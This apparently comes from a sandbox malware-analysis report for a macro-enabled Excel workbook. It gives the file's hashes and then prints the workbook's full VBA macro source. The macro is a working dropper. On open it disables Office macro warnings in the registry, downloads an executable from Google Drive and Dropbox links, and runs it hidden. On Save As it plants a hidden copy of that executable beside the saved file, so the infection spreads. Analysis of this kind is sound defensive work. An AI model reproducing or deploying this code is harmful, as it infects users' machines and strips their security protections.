Behavioral task
behavioral1
Sample
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2.xlsm
Resource
win10v2004-20240508-en
General
-
Target
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2
-
Size
92KB
-
MD5
0e34bd639b25c855aadf84f46b09203c
-
SHA1
167ede90f0c060417bdbf1389141bcc3c20a01b4
-
SHA256
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2
-
SHA512
cd26ab5739f76f0fef49654502bc8f804b66c3f6eb25fd945dcb71851164367895b70db81b2ff3bb5a08a489e076f98c5d2fb95950caa8c47633217420693ab0
-
SSDEEP
1536:CguZCa6S5khUIOwgKPbY+5l4znOSjhLzVubGa/M1NIpPkUlB7583fjncFYIIreFo:CgugapkhlOkMSlaPjpzVw/Ms8ULavLc8
Malware Config
Signatures
-
resource sample
Files
-
f6ebe6cac0122d33e931c536fbd946e6a09efb9a4761eab0db8206fa08930bc2.xlsm office2007
ThisWorkbook
1Attribute VB_Name = "ThisWorkbook"2Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = True9Dim SheetsChanged As Boolean10Dim SheetCount As Integer1112Private Sub Workbook_Open()13Dim i As Integer14For i = 1 To ActiveWorkbook.Sheets.Count15ActiveWorkbook.Sheets(i).Visible = xlSheetVisible16Next i1718RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"19RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"2021Application.DisplayAlerts = False22SheetCount = Worksheets.Count2324Call MPS2526ActiveWorkbook.Sheets(1).Select27SheetsChanged = False28End Sub2930Private Sub Workbook_BeforeClose(Cancel As Boolean)31If Not SheetsChanged Then32ActiveWorkbook.Saved = True33End If34End Sub3536Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)37SheetsChanged = True38End Sub3940Private Sub Workbook_NewSheet(ByVal Sh As Object)41SheetsChanged = True42End Sub4344Private Sub Workbook_SheetActivate(ByVal Sh As Object)45If ActiveWorkbook.Sheets.Count <> SheetCount Then46SheetsChanged = True47SheetCount = ActiveWorkbook.Sheets.Count48End If49End Sub5051Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)52Dim i As Integer53Dim AIndex As Integer54Dim FName5556AIndex = ActiveWorkbook.ActiveSheet.Index5758If SaveAsUI = False Then59Cancel = True60Application.EnableEvents = False61Application.ScreenUpdating = False6263For i = 1 To ActiveWorkbook.Sheets.Count - 164ActiveWorkbook.Sheets(i).Visible = xlSheetHidden65Next i66ActiveWorkbook.Save6768For i = 1 To ActiveWorkbook.Sheets.Count69ActiveWorkbook.Sheets(i).Visible = xlSheetVisible70Next i71ActiveWorkbook.Sheets(AIndex).Select72SheetsChanged = False7374Application.ScreenUpdating = True75Application.EnableEvents = True76Else77Cancel = True78Application.EnableEvents = False79Application.ScreenUpdating = False8081For i = 1 To ActiveWorkbook.Sheets.Count - 182ActiveWorkbook.Sheets(i).Visible = xlSheetHidden83Next i8485FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")86If FName <> False Then87ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled88SaveAsInj ActiveWorkbook.Path89End If9091For i = 1 To ActiveWorkbook.Sheets.Count92ActiveWorkbook.Sheets(i).Visible = xlSheetVisible93Next i94ActiveWorkbook.Sheets(AIndex).Select95SheetsChanged = False9697Application.ScreenUpdating = True98Application.EnableEvents = True99End If100End Sub101102Sub SaveAsInj(DIR As String)103Dim FSO As Object104Dim FN As String105106Set FSO = CreateObject("scripting.filesystemobject")107FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"108109If FSO.FileExists(FN) Then110If Not FSO.FileExists(DIR & "\~$cache1") Then111FileCopy FN, DIR & "\~$cache1"112End If113SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem114End If115End Sub116117Function RegKeyRead(i_RegKey As String) As String118Dim myWS As Object119120On Error Resume Next121Set myWS = CreateObject("WScript.Shell")122RegKeyRead = myWS.RegRead(i_RegKey)123End Function124125Function RegKeyExists(i_RegKey As String) As Boolean126Dim myWS As Object127128On Error GoTo ErrorHandler129Set myWS = CreateObject("WScript.Shell")130myWS.RegRead i_RegKey131RegKeyExists = True132Exit Function133134ErrorHandler:135RegKeyExists = False136End Function137138Sub RegKeySave(i_RegKey As String, _139i_Value As String, _140Optional i_Type As String = "REG_SZ")141Dim myWS As Object142143Set myWS = CreateObject("WScript.Shell")144myWS.RegWrite i_RegKey, i_Value, i_Type145End Sub146147Sub MPS()148Dim FSO As Object149Dim FP(1 To 3), TMP, URL(1 To 3) As String150151Set FSO = CreateObject("scripting.filesystemobject")152FP(1) = ActiveWorkbook.Path & "\~$cache1"153FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"154155URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"156URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"157URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"158TMP = Environ("Temp") & "\~$cache1.exe"159160If FSO.FileExists(FP(1)) Then161If Not FSO.FileExists(TMP) Then162FileCopy FP(1), TMP163End If164Shell TMP, vbHide165ElseIf FSO.FileExists(FP(2)) Then166If Not FSO.FileExists(TMP) Then167FileCopy FP(2), TMP168End If169Shell TMP, vbHide170Else171If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then172Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide173ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then174Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide175ElseIf Not FSO.FileExists(TMP) Then176If FDW((URL(1)), (TMP)) Then177ElseIf FDW((URL(2)), (TMP)) Then178ElseIf FDW((URL(3)), (TMP)) Then179End If180If FSO.FileExists(TMP) Then181Shell TMP, vbHide182End If183Else184Shell TMP, vbHide185End If186187End If188189End Sub190191Function FDW(MYU, NMA As String) As Boolean192Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")193If WinHttpReq Is Nothing Then194Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")195End If196197WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"198WinHttpReq.Option(6) = AllowRedirects199WinHttpReq.Open "GET", MYU, False200WinHttpReq.Send201202If (WinHttpReq.Status = 200) Then203If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then204FDW = True205Set oStream = CreateObject("ADODB.Stream")206oStream.Open207oStream.Type = 1208oStream.Write WinHttpReq.ResponseBody209oStream.SaveToFile (NMA)210oStream.Close211Else212FDW = False213End If214Else215FDW = False216End If217End Function218219